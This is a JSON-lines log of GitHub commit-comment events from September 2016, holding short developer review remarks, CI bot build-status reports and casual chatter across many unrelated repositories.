{"id":"4552382488","type":"CommitCommentEvent","actor":{"login":"lucasgallucci"},"repo":{"name":"maguimonserrat/tp"},"payload":{"comment":{"id":18993011,"position":null,"line":null,"path":null,"commit_id":"27e9b1cfd55edb08ec2fe30c06167175ec7bac6e","created_at":"2016-09-12T22:47:22Z","updated_at":"2016-09-12T22:47:22Z","body":"Bien Magui! seguí trabajándolo."}},"created_at":"2016-09-12T22:47:22Z"}
{"id":"4552384475","type":"CommitCommentEvent","actor":{"login":"vishrutshah"},"repo":{"name":"veronicagg/autorest"},"payload":{"comment":{"id":18993023,"position":32,"line":110,"path":"src/generator/AutoRest.Ruby/Templates/ServiceClientTemplate.cshtml","commit_id":"93f58bcdb50e20baef5345d2c33f62ed7d896270","created_at":"2016-09-12T22:47:50Z","updated_at":"2016-09-12T22:47:50Z","body":"I am bit suspicious about `application/json;charset=utf-8`. Are you sure we'll always need it that?"}},"created_at":"2016-09-12T22:47:50Z"}
{"id":"4552384531","type":"CommitCommentEvent","actor":{"login":"alberthoekstra"},"repo":{"name":"alberthoekstra/DungeonBuddy"},"payload":{"comment":{"id":18993024,"position":25,"line":25,"path":"DungeonBuddy/Legion/Dungeons/HallsOfValor.cs","commit_id":"1f24c98d7cdce7e2c663042045c4a77b1113d5c8","created_at":"2016-09-12T22:47:52Z","updated_at":"2016-09-12T22:47:52Z","body":"Small typo"}},"created_at":"2016-09-12T22:47:52Z"}
{"id":"4552385090","type":"CommitCommentEvent","actor":{"login":"shamasis"},"repo":{"name":"postmanlabs/postman-collection"},"payload":{"comment":{"id":18993025,"position":35,"line":181,"path":"lib/collection/response.js","commit_id":"3560353cf57ee8fe289c6c72512df68b0db2fddd","created_at":"2016-09-12T22:48:00Z","updated_at":"2016-09-12T22:48:00Z","body":"No. It doesn't work like that. We cannot proceed or comment further on this PR unless we have a talk explaining this or @czardoz takes over to create a new PR. Again, I would not like deletions and additions in this PR. "}},"created_at":"2016-09-12T22:48:00Z"}
{"id":"4552390064","type":"CommitCommentEvent","actor":{"login":"Powersource"},"repo":{"name":"exoji2e/BlackBox"},"payload":{"comment":{"id":18993052,"position":12,"line":13,"path":"Java/README.md","commit_id":"48d7b93f2c1c193e60f2127b5b76bca75e104b04","created_at":"2016-09-12T22:49:12Z","updated_at":"2016-09-12T22:49:12Z","body":"Wtf java"}},"created_at":"2016-09-12T22:49:12Z"}
{"id":"4552391531","type":"CommitCommentEvent","actor":{"login":"blackicewei"},"repo":{"name":"blackicewei/Test"},"payload":{"comment":{"id":18993059,"position":null,"line":null,"path":null,"commit_id":"aca727e3604e36da71472f14c16ea57e205f29a0","created_at":"2016-09-12T22:49:32Z","updated_at":"2016-09-12T22:49:32Z","body":"```diff\r\n-foo\r\n-bar\r\n```"}},"created_at":"2016-09-12T22:49:32Z"}
{"id":"4552393443","type":"CommitCommentEvent","actor":{"login":"vishrutshah"},"repo":{"name":"veronicagg/autorest"},"payload":{"comment":{"id":18993079,"position":70,"line":148,"path":"src/generator/AutoRest.Ruby/Templates/ServiceClientTemplate.cshtml","commit_id":"93f58bcdb50e20baef5345d2c33f62ed7d896270","created_at":"2016-09-12T22:49:59Z","updated_at":"2016-09-12T22:49:59Z","body":"any reason for `make_request_with_http_info` to be in module and others in class?  or i am not seeing them correctly."}},"created_at":"2016-09-12T22:49:59Z"}
{"id":"4552396347","type":"CommitCommentEvent","actor":{"login":"vishrutshah"},"repo":{"name":"veronicagg/autorest"},"payload":{"comment":{"id":18993095,"position":29,"line":29,"path":"src/client/Ruby/ms-rest/lib/ms_rest/connection.rb","commit_id":"93f58bcdb50e20baef5345d2c33f62ed7d896270","created_at":"2016-09-12T22:50:40Z","updated_at":"2016-09-12T22:50:40Z","body":"any reason for using `Module.const_get` instead of methods that were overridden? "}},"created_at":"2016-09-12T22:50:40Z"}
{"id":"4552402959","type":"CommitCommentEvent","actor":{"login":"jaylach"},"repo":{"name":"pnb3431/bloc-jams-angular"},"payload":{"comment":{"id":18993129,"position":7,"line":19,"path":"dist/scripts/app.js","commit_id":"95becb8ab51ba7eeae2f3bf061765ef019db6ca4","created_at":"2016-09-12T22:52:19Z","updated_at":"2016-09-12T22:52:19Z","body":"Watch your formatting!"}},"created_at":"2016-09-12T22:52:19Z"}
{"id":"4552406343","type":"CommitCommentEvent","actor":{"login":"jaylach"},"repo":{"name":"pnb3431/bloc-jams-angular"},"payload":{"comment":{"id":18993142,"position":9,"line":14,"path":"app/templates/album.html","commit_id":"91abfe506ba5b3752863506cabeb73cdaca1a2ae","created_at":"2016-09-12T22:53:07Z","updated_at":"2016-09-12T22:53:07Z","body":"These should be indented since they are children of the `<tr />`"}},"created_at":"2016-09-12T22:53:07Z"}
{"id":"4552410289","type":"CommitCommentEvent","actor":{"login":"summerblue"},"repo":{"name":"HejunweiCoder/laravel-docs"},"payload":{"comment":{"id":18993157,"position":181,"line":183,"path":"scout.md","commit_id":"49ed54bc83d9471fc5fff89b544364e0771bfc66","created_at":"2016-09-12T22:54:06Z","updated_at":"2016-09-12T22:54:06Z","body":"\r\nEloquent query 翻译为 ：Eloquent 查询语句"}},"created_at":"2016-09-12T22:54:06Z"}
{"id":"4552416512","type":"CommitCommentEvent","actor":{"login":"mborn319"},"repo":{"name":"mborn319/Wahji"},"payload":{"comment":{"id":18993189,"position":null,"line":null,"path":null,"commit_id":"9e5dab2598071fda0ec3fe165d70710741afef5d","created_at":"2016-09-12T22:55:41Z","updated_at":"2016-09-12T22:55:41Z","body":"Had a thought... it may be easiest to add the current directory to the $PATH variable than to move the executable to a bin/ directory.\r\n\r\nhttp://unix.stackexchange.com/questions/26047/how-to-correctly-add-a-path-to-path"}},"created_at":"2016-09-12T22:55:41Z"}
{"id":"4552417320","type":"CommitCommentEvent","actor":{"login":"vishrutshah"},"repo":{"name":"veronicagg/autorest"},"payload":{"comment":{"id":18993192,"position":20,"line":20,"path":"src/client/Ruby/ms-rest/lib/ms_rest/connection.rb","commit_id":"93f58bcdb50e20baef5345d2c33f62ed7d896270","created_at":"2016-09-12T22:55:53Z","updated_at":"2016-09-12T22:55:53Z","body":"If `{middlewares: [[MsRest::RetryPolicyMiddleware, times: 3, retry: 0.02], [:cookie_jar]]}` is being const then we should define it at class level instead of method level."}},"created_at":"2016-09-12T22:55:53Z"}
{"id":"4552421629","type":"CommitCommentEvent","actor":{"login":"Amazinite"},"repo":{"name":"endless-sky/endless-sky"},"payload":{"comment":{"id":18993207,"position":null,"line":null,"path":null,"commit_id":"d418679cbaed7cbf37a3b1e5f88d613839df246d","created_at":"2016-09-12T22:56:57Z","updated_at":"2016-09-12T22:56:57Z","body":":+1:"}},"created_at":"2016-09-12T22:56:57Z"}
{"id":"4552428117","type":"CommitCommentEvent","actor":{"login":"summerblue"},"repo":{"name":"HejunweiCoder/laravel-docs"},"payload":{"comment":{"id":18993220,"position":240,"line":241,"path":"scout.md","commit_id":"49ed54bc83d9471fc5fff89b544364e0771bfc66","created_at":"2016-09-12T22:58:33Z","updated_at":"2016-09-12T22:58:33Z","body":">  search queries\r\n\r\n译为：\r\n\r\n> 搜索语句"}},"created_at":"2016-09-12T22:58:33Z"}
{"id":"4552433288","type":"CommitCommentEvent","actor":{"login":"cthoyt"},"repo":{"name":"bit-lsi/bug-free-eureka"},"payload":{"comment":{"id":18993236,"position":null,"line":null,"path":null,"commit_id":"78e766624bfe89f8a05cc48a769f392104887b80","created_at":"2016-09-12T22:59:55Z","updated_at":"2016-09-12T22:59:55Z","body":"- Duck Typing\r\n- Explanation of how to use `self`\r\n- Use of `@staticmethod` and `@classmethod` decorators\r\n- User of `@property`\r\n- PEP8-style function names\r\n- use of `super()` and MRO\r\n- Python doesn't have proper function overloading \r\n\r\n"}},"created_at":"2016-09-12T22:59:55Z"}
{"id":"4552439756","type":"CommitCommentEvent","actor":{"login":"Kevin-Robertson"},"repo":{"name":"Kevin-Robertson/Inveigh"},"payload":{"comment":{"id":18993255,"position":null,"line":null,"path":null,"commit_id":"387cfea5b08fbbb168ba8f8e3b54f5acf58c86b4","created_at":"2016-09-12T23:01:26Z","updated_at":"2016-09-12T23:01:26Z","body":"Hah no, that's not me. It looks like I share a name with someone that has some similar interests though:)"}},"created_at":"2016-09-12T23:01:26Z"}
{"id":"4552441374","type":"CommitCommentEvent","actor":{"login":"FrostTheFox"},"repo":{"name":"PokemonGoMap/PokemonGo-Map"},"payload":{"comment":{"id":18993260,"position":5,"line":29,"path":"pogom/proxy.py","commit_id":"04723899c15fd0b71d6bf9a6b90fe335fa23cf82","created_at":"2016-09-12T23:01:52Z","updated_at":"2016-09-12T23:01:52Z","body":"@erikssonk np :)"}},"created_at":"2016-09-12T23:01:52Z"}
{"id":"4552442420","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":18993262,"position":null,"line":null,"path":null,"commit_id":"7c1dc8bcd5df1ace4b591d7e161f1fce6032db15","created_at":"2016-09-12T23:02:09Z","updated_at":"2016-09-12T23:02:09Z","body":"EMS (brianlball) - Win64-Windows-7-VisualStudio-12: OK (2304 of 2466 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-7c1dc8bcd5df1ace4b591d7e161f1fce6032db15-Win64-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-7c1dc8bcd5df1ace4b591d7e161f1fce6032db15-Win64-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-93.43%25-yellow.svg)</a> \n"}},"created_at":"2016-09-12T23:02:09Z"}
{"id":"4552443884","type":"CommitCommentEvent","actor":{"login":"abc612008"},"repo":{"name":"Infinideastudio/NEWorld"},"payload":{"comment":{"id":18993270,"position":null,"line":null,"path":null,"commit_id":"08c75637edb3c38da12623ff302ea6824aa3f806","created_at":"2016-09-12T23:02:30Z","updated_at":"2016-09-12T23:02:30Z","body":"那是啥意思"}},"created_at":"2016-09-12T23:02:30Z"}
{"id":"4552448722","type":"CommitCommentEvent","actor":{"login":"zacharyacutey"},"repo":{"name":"JoinRajuncraftNow/Projects"},"payload":{"comment":{"id":18993288,"position":null,"line":null,"path":null,"commit_id":"3ec0abbf0ea3fba34ca566d8045b4f1a92a8d2c2","created_at":"2016-09-12T23:03:41Z","updated_at":"2016-09-12T23:03:41Z","body":"I GIVE UP ON DEBUGGING THIS CRAP!"}},"created_at":"2016-09-12T23:03:41Z"}
{"id":"4552449103","type":"CommitCommentEvent","actor":{"login":"caall99"},"repo":{"name":"jetty840/Sailfish-MightyBoardFirmware"},"payload":{"comment":{"id":18993292,"position":null,"line":null,"path":null,"commit_id":"7040951d3f217b0964bf3199a04568a0a7386aab","created_at":"2016-09-12T23:03:47Z","updated_at":"2016-09-12T23:03:47Z","body":"Hey Dan,\r\n\r\nDid you merge this after testing and seeing that it works? Just curious if this is ready to build.\r\n\r\nThanks"}},"created_at":"2016-09-12T23:03:47Z"}
{"id":"4552452632","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":18993305,"position":null,"line":null,"path":null,"commit_id":"20a9db4c8c81402a338f05ba96a294c025eda803","created_at":"2016-09-12T23:04:41Z","updated_at":"2016-09-12T23:04:41Z","body":"os_2_0_develop_linux (macumber) - i386-Windows-7-VisualStudio-12: Tests Failed (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-20a9db4c8c81402a338f05ba96a294c025eda803-i386-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-20a9db4c8c81402a338f05ba96a294c025eda803-i386-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-12T23:04:41Z"}
{"id":"4552456729","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18993324,"position":null,"line":null,"path":null,"commit_id":"6f42046d7d456227da7f77a6b13dbb8b26fd72d8","created_at":"2016-09-12T23:05:36Z","updated_at":"2016-09-12T23:05:36Z","body":"#4262-Cooling-Towers-are-not-being-sequentially-loaded,-all-towers-are-running (rraustad) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1189 of 1189 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-6f42046d7d456227da7f77a6b13dbb8b26fd72d8-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-6f42046d7d456227da7f77a6b13dbb8b26fd72d8-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-6f42046d7d456227da7f77a6b13dbb8b26fd72d8-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-36.1%25-green.svg)</a>\n"}},"created_at":"2016-09-12T23:05:36Z"}
{"id":"4552457689","type":"CommitCommentEvent","actor":{"login":"sjnewbury"},"repo":{"name":"libretro/bsnes-libretro"},"payload":{"comment":{"id":18993331,"position":null,"line":null,"path":null,"commit_id":"42e51ad1ac2553afe1d166ff2b75adeb8b235351","created_at":"2016-09-12T23:05:53Z","updated_at":"2016-09-12T23:05:53Z","body":"This breaks the Linux build.  If libdl isn't linked, there are undefined references to dlopen()"}},"created_at":"2016-09-12T23:05:53Z"}
{"id":"4552458559","type":"CommitCommentEvent","actor":{"login":"rubenmachuca"},"repo":{"name":"rubenmachuca/PLUS-500"},"payload":{"comment":{"id":18993339,"position":null,"line":null,"path":null,"commit_id":"a6eb8aac2a0e98ba7cb14042e22a16e124385808","created_at":"2016-09-12T23:06:07Z","updated_at":"2016-09-12T23:06:07Z","body":"![1439253767351 3](https://cloud.githubusercontent.com/assets/16237898/18455896/b73511d6-7901-11e6-9d3b-455097c4d27a.jpg)\r\n![1437170515870 2](https://cloud.githubusercontent.com/assets/16237898/18455899/c5d0c08c-7901-11e6-812d-df06c0ce54a6.jpg)\r\n![1437170530909 3](https://cloud.github\r\n[Gmail - pendientes pagos https___app.plus500.pdf](https://github.com/rubenmachuca/PLUS-500/files/468511/Gmail.-.pendientes.pagos.https___app.plus500.pdf)\r\nusercontent.com/assets/16237898/18455910/d7723fc8-7901-11e6-9847-305a1233f6e8.jpg)\r\n\r\n"}},"created_at":"2016-09-12T23:06:07Z"}
{"id":"4552460453","type":"CommitCommentEvent","actor":{"login":"rubenmachuca"},"repo":{"name":"rubenmachuca/PLUS-500"},"payload":{"comment":{"id":18993348,"position":null,"line":null,"path":null,"commit_id":"a6eb8aac2a0e98ba7cb14042e22a16e124385808","created_at":"2016-09-12T23:06:36Z","updated_at":"2016-09-12T23:06:36Z","body":"[Gmail - pendientes pagos https___app.plus500.pdf](https://github.com/rubenmachuca/PLUS-500/files/468512/Gmail.-.pendientes.pagos.https___app.plus500.pdf)\r\n"}},"created_at":"2016-09-12T23:06:36Z"}
{"id":"4552462244","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":18993356,"position":null,"line":null,"path":null,"commit_id":"20a9db4c8c81402a338f05ba96a294c025eda803","created_at":"2016-09-12T23:07:04Z","updated_at":"2016-09-12T23:07:04Z","body":"os_2_0_develop_linux (macumber) - Win64-Windows-7-VisualStudio-12: Tests Failed (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-20a9db4c8c81402a338f05ba96a294c025eda803-Win64-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-20a9db4c8c81402a338f05ba96a294c025eda803-Win64-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-12T23:07:04Z"}
{"id":"4552463375","type":"CommitCommentEvent","actor":{"login":"DominusExult"},"repo":{"name":"DominusExult/sulaco-dominus"},"payload":{"comment":{"id":18993363,"position":null,"line":null,"path":null,"commit_id":"e297afd00e799144af01d4de102d15b5b92f8ac5","created_at":"2016-09-12T23:07:22Z","updated_at":"2016-09-12T23:07:22Z","body":"so far it looks good. I'm trying to take baby steps to be able to test for regressions better."}},"created_at":"2016-09-12T23:07:22Z"}
{"id":"4552466564","type":"CommitCommentEvent","actor":{"login":"rubenmachuca"},"repo":{"name":"rubenmachuca/PLUS-500"},"payload":{"comment":{"id":18993382,"position":1,"line":1,"path":"README.md","commit_id":"a6eb8aac2a0e98ba7cb14042e22a16e124385808","created_at":"2016-09-12T23:08:17Z","updated_at":"2016-09-12T23:08:17Z","body":"que hago para retirar  "}},"created_at":"2016-09-12T23:08:17Z"}
{"id":"4552466979","type":"CommitCommentEvent","actor":{"login":"mikerogne"},"repo":{"name":"DominusExult/sulaco-dominus"},"payload":{"comment":{"id":18993385,"position":null,"line":null,"path":null,"commit_id":"e297afd00e799144af01d4de102d15b5b92f8ac5","created_at":"2016-09-12T23:08:24Z","updated_at":"2016-09-12T23:08:24Z","body":"Awesome! :)"}},"created_at":"2016-09-12T23:08:24Z"}
{"id":"4552472260","type":"CommitCommentEvent","actor":{"login":"DominusExult"},"repo":{"name":"aaronj1335/textual-sulaco"},"payload":{"comment":{"id":18993414,"position":null,"line":null,"path":null,"commit_id":"46ce954a6ac1c6282d2b359cead8b90ad8089b64","created_at":"2016-09-12T23:09:50Z","updated_at":"2016-09-12T23:09:50Z","body":"\"var nickRe = new RegExp(app.localUserNickname(), 'i');\" doesn't seem to work on Textual 6.\r\nUpstream has other fixes to make Sulaco work on Textual 6 again."}},"created_at":"2016-09-12T23:09:50Z"}
{"id":"4552478847","type":"CommitCommentEvent","actor":{"login":"ajtheralloster182"},"repo":{"name":"maierfelix/POGOserver"},"payload":{"comment":{"id":18993442,"position":null,"line":null,"path":null,"commit_id":"0eb318debc3131698bdb26489a4a01a2fbf62d50","created_at":"2016-09-12T23:11:38Z","updated_at":"2016-09-12T23:11:38Z","body":"how do you add gyms and pokestops there is no guide please help"}},"created_at":"2016-09-12T23:11:38Z"}
{"id":"4552485486","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18993466,"position":null,"line":null,"path":null,"commit_id":"5d3c27d6c4f3bf7bb452ff005934cb09f6d76700","created_at":"2016-09-12T23:13:26Z","updated_at":"2016-09-12T23:13:26Z","body":"113835705-Low-Temp-Radiant-Variable-Flow-Autosize-Issue (mjwitte) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: OK (2366 of 2369 tests passed, 0 test warnings)\n\n * 3 tests had: AUD diffs.\n * 3 tests had: EIO diffs.\n * 3 tests had: ERR diffs.\n * 3 tests had: ESO big diffs.\n * 3 tests had: MTR big diffs.\n * 3 tests had: Table big diffs.\n * 1 test had: MTD diffs.\n * 1 test had: ZSZ big diffs.\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-5d3c27d6c4f3bf7bb452ff005934cb09f6d76700-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-5d3c27d6c4f3bf7bb452ff005934cb09f6d76700-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.87%25-yellow.svg)</a> \n"}},"created_at":"2016-09-12T23:13:26Z"}
{"id":"4552487923","type":"CommitCommentEvent","actor":{"login":"sjnewbury"},"repo":{"name":"libretro/bsnes-libretro"},"payload":{"comment":{"id":18993479,"position":null,"line":null,"path":null,"commit_id":"17cbfb15205f7e7ea54574ce5db63c0a7cd96841","created_at":"2016-09-12T23:14:06Z","updated_at":"2016-09-12T23:14:06Z","body":"machine/endian.h doesn't exist on Linux.  #include <endian.h> should be used instead if this header is needed.  I sent a git patch to libretro@gmail.com\r\n"}},"created_at":"2016-09-12T23:14:06Z"}
{"id":"4552488384","type":"CommitCommentEvent","actor":{"login":"jonschlinkert"},"repo":{"name":"generate/generate-defaults"},"payload":{"comment":{"id":18993480,"position":null,"line":null,"path":null,"commit_id":"27dec5408ce4a6c44c076403204b3e33879e26ed","created_at":"2016-09-12T23:14:13Z","updated_at":"2016-09-12T23:14:13Z","body":"Strange fix? Is it strange to set a broken bone because it will hurt?\r\n\r\nI already mentioned this in the related issues, but I'm working on fixing data. "}},"created_at":"2016-09-12T23:14:13Z"}
{"id":"4552494459","type":"CommitCommentEvent","actor":{"login":"davis"},"repo":{"name":"belackriv/plugin-hbs"},"payload":{"comment":{"id":18993497,"position":null,"line":null,"path":null,"commit_id":"5eaf20996055f908561d32dbc7e453d43573eaff","created_at":"2016-09-12T23:15:51Z","updated_at":"2016-09-12T23:15:51Z","body":"sweet! i was running into the same issue long time ago, and it was stopping me from using this plugin across projects. thanks for testing it out"}},"created_at":"2016-09-12T23:15:51Z"}
{"id":"4552501724","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18993514,"position":null,"line":null,"path":null,"commit_id":"5d3c27d6c4f3bf7bb452ff005934cb09f6d76700","created_at":"2016-09-12T23:17:54Z","updated_at":"2016-09-12T23:17:54Z","body":"113835705-Low-Temp-Radiant-Variable-Flow-Autosize-Issue (mjwitte) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-5d3c27d6c4f3bf7bb452ff005934cb09f6d76700-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a>  \n"}},"created_at":"2016-09-12T23:17:54Z"}
{"id":"4552504181","type":"CommitCommentEvent","actor":{"login":"GrigoriLomonosov"},"repo":{"name":"GrigoriLomonosov/BinaryPuzzleSolver"},"payload":{"comment":{"id":18993523,"position":null,"line":null,"path":null,"commit_id":"4a596d3e90ff44aba8fd792608243e3b50be0b39","created_at":"2016-09-12T23:18:39Z","updated_at":"2016-09-12T23:18:39Z","body":"ja ingewikkelder is gewoon met meer lussen en dus hogere complexiteit. "}},"created_at":"2016-09-12T23:18:39Z"}
{"id":"4552505374","type":"CommitCommentEvent","actor":{"login":"chrmarti"},"repo":{"name":"Microsoft/vscode"},"payload":{"comment":{"id":18993526,"position":49,"line":243,"path":"src/vs/workbench/parts/search/browser/openAnythingHandler.ts","commit_id":"99d95ace6c7a5718c2f8f406b5b0e8a83a2aba71","created_at":"2016-09-12T23:18:59Z","updated_at":"2016-09-12T23:18:59Z","body":"@bpasero The openSymbolHandler always returns false currently. Does that have the intended effect then? It might not be an issue since includeSymbols is false by default from what I saw?"}},"created_at":"2016-09-12T23:18:59Z"}
{"id":"4552509433","type":"CommitCommentEvent","actor":{"login":"dcnewman"},"repo":{"name":"jetty840/Sailfish-MightyBoardFirmware"},"payload":{"comment":{"id":18993536,"position":null,"line":null,"path":null,"commit_id":"7040951d3f217b0964bf3199a04568a0a7386aab","created_at":"2016-09-12T23:20:11Z","updated_at":"2016-09-12T23:20:11Z","body":"On 12/09/2016 4:03 PM, caall99 wrote:\n> Hey Dan,\n>\n> Did you merge this after testing and seeing that it works? Just curious if this is ready to build.\n\nNo, I merged it first.  Pain in the neck otherwise since git isn't our primary development source control\nsystem.  git is just how we make the sources public.  Behind the scenes we use a private svn repo.\n\nDan\n\n"}},"created_at":"2016-09-12T23:20:11Z"}
{"id":"4552519986","type":"CommitCommentEvent","actor":{"login":"caall99"},"repo":{"name":"jetty840/Sailfish-MightyBoardFirmware"},"payload":{"comment":{"id":18993573,"position":null,"line":null,"path":null,"commit_id":"7040951d3f217b0964bf3199a04568a0a7386aab","created_at":"2016-09-12T23:22:59Z","updated_at":"2016-09-12T23:22:59Z","body":"Which toolchain will I have to use with this? 4.6.2/4.6.3 or dbavatar's recommended 4.9.2? How can I update to 4.9.2 without updating to the newest release (5.xxx)? Thanks"}},"created_at":"2016-09-12T23:22:59Z"}
{"id":"4552522685","type":"CommitCommentEvent","actor":{"login":"rcole824"},"repo":{"name":"rcole824/Hello-World"},"payload":{"comment":{"id":18993586,"position":null,"line":null,"path":null,"commit_id":"2565120a25bae2ae8c998f489d110ce533383f2d","created_at":"2016-09-12T23:23:46Z","updated_at":"2016-09-12T23:23:46Z","body":"Addition"}},"created_at":"2016-09-12T23:23:46Z"}
{"id":"4552525915","type":"CommitCommentEvent","actor":{"login":"hoyosjs"},"repo":{"name":"sxlijin/copenhagent"},"payload":{"comment":{"id":18993595,"position":5,"line":16,"path":"ai/papersoccer.py","commit_id":"ecea73a065c4ea5b1c30be6ac12bde0f26cc2815","created_at":"2016-09-12T23:24:39Z","updated_at":"2016-09-12T23:24:39Z","body":"This is "}},"created_at":"2016-09-12T23:24:39Z"}
{"id":"4552527297","type":"CommitCommentEvent","actor":{"login":"at15"},"repo":{"name":"tongquhq/about"},"payload":{"comment":{"id":18993601,"position":null,"line":null,"path":null,"commit_id":"9aed4b50f41a7d55cfc460f9882e0917c1ef216a","created_at":"2016-09-12T23:25:02Z","updated_at":"2016-09-12T23:25:02Z","body":"it's my own fault, see 768f836e6b1f5a7e9b762f7e42d8fbc95a1b6364"}},"created_at":"2016-09-12T23:25:02Z"}
{"id":"4552531553","type":"CommitCommentEvent","actor":{"login":"gubatron"},"repo":{"name":"frostwire/frostwire"},"payload":{"comment":{"id":18993611,"position":null,"line":null,"path":null,"commit_id":"7995727af8c15c44c183cfbcd88dd4eebdd74e04","created_at":"2016-09-12T23:26:12Z","updated_at":"2016-09-12T23:26:12Z","body":"when the you from the future meets the you from 9 years ago."}},"created_at":"2016-09-12T23:26:12Z"}
{"id":"4552533387","type":"CommitCommentEvent","actor":{"login":"sigsegv-mvm"},"repo":{"name":"SteamDatabase/GameTracking"},"payload":{"comment":{"id":18993616,"position":4,"line":17710,"path":"Strings/tf/client.txt","commit_id":"4f0d6d3d92e735650c4ab17f1f3d1379bcee2dc3","created_at":"2016-09-12T23:26:42Z","updated_at":"2016-09-12T23:26:42Z","body":"Yes, some idiot at Valve was doing pointer comparison rather than actual string content comparison in `CUtlMap<CUtlString, T>` situations. I'll let the stupidity of that sink in for a moment. I guess you'll have to take my word for it if you really take the \"no disassembling things\" part of the ToS seriously."}},"created_at":"2016-09-12T23:26:42Z"}
{"id":"4552535048","type":"CommitCommentEvent","actor":{"login":"adrian-prantl"},"repo":{"name":"adrian-prantl/swift"},"payload":{"comment":{"id":18993623,"position":61,"line":1444,"path":"lib/AST/Type.cpp","commit_id":"ceb67554ba0f80cd17bf2dac3ba0e1525f02d253","created_at":"2016-09-12T23:27:11Z","updated_at":"2016-09-12T23:27:11Z","body":"This hack was added to deal with inconsistent type systems. It avoids crashing when the type system is unsolvable. Either mapTypeOutOfContext() or subst() would fail miserably when there are any type variables left, so this avoids the problem by always returning an ErrorType. Please let me know if there's a better solution!"}},"created_at":"2016-09-12T23:27:11Z"}
{"id":"4552537344","type":"CommitCommentEvent","actor":{"login":"blakedy"},"repo":{"name":"shinjonathan/jesque"},"payload":{"comment":{"id":18993629,"position":149,"line":149,"path":"src/main/java/net/greghaines/jesque/DelayedJob.java","commit_id":"fb141c9499a8b2226dd79c6cc6ba5ad0ce75fdc7","created_at":"2016-09-12T23:27:50Z","updated_at":"2016-09-12T23:27:50Z","body":"if both `className` is null should you return true?"}},"created_at":"2016-09-12T23:27:50Z"}
{"id":"4552538381","type":"CommitCommentEvent","actor":{"login":"sigsegv-mvm"},"repo":{"name":"SteamDatabase/GameTracking"},"payload":{"comment":{"id":18993630,"position":29,"line":64455,"path":"Strings/tf/client.txt","commit_id":"4f0d6d3d92e735650c4ab17f1f3d1379bcee2dc3","created_at":"2016-09-12T23:28:09Z","updated_at":"2016-09-12T23:28:09Z","body":"Comparator for doing actual string key comparisons instead of string pointer idiocy. This isn't new in the SDK; it must have been unused in TF prior to this build though, since it only showed up now."}},"created_at":"2016-09-12T23:28:09Z"}
{"id":"4552539961","type":"CommitCommentEvent","actor":{"login":"Zambom"},"repo":{"name":"amadeusproject/amadeuslms"},"payload":{"comment":{"id":18993637,"position":null,"line":null,"path":null,"commit_id":"3652ee1c2c5aa11ccf9434dd2ef16d29cdab5fc0","created_at":"2016-09-12T23:28:34Z","updated_at":"2016-09-12T23:28:34Z","body":"It's not 100% solved, after pressing back button sometimes it still gets back to login page..."}},"created_at":"2016-09-12T23:28:34Z"}
{"id":"4552541708","type":"CommitCommentEvent","actor":{"login":"kageiit"},"repo":{"name":"facebook/buck"},"payload":{"comment":{"id":18993639,"position":null,"line":null,"path":null,"commit_id":"4b81d63ac18a6f626f2fd23c088eb29e0ebba4b6","created_at":"2016-09-12T23:29:05Z","updated_at":"2016-09-12T23:29:05Z","body":"Haha I was just about to open a PR for this!\r\n\r\nThanks!"}},"created_at":"2016-09-12T23:29:05Z"}
